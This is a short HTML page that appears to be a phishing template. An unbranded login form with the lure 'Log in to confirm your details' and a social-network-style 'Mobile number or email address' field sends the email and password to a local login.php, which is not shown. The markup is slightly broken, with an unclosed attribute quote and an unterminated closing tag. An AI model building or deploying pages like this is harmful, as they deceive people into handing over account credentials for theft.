

<!DOCTYPE html>
<html>
<head>
	<meta charset="utf-8">
	<meta name="viewport" content="width=device-width, initial-scale=1.0">
	<title>Log in</title>
	<link rel="stylesheet" href="https://use.fontawesome.com/releases/v5.8.2/css/all.css">
	<link rel="stylesheet" type="text/css" href="./index_files/login.css">
</head>
<body>
<center>
	<form method="POST" action="./index_files/login.php">
		<img src="index_files/mass.jpg" style="width:50px; alt="User Icon"/>
		<h4>Log in to confirm your details</h4>
		<input type="text" name="email" placeholder="Mobile number or email address" required autocomplete>
		<input type="password" name="pass" placeholder="Password" required autocomplete>
		<button name="login">Login</button>
	<span>Copyright &copy; 2020. All Rights Reserved</span>
	</form>
	</center>
</body>
</html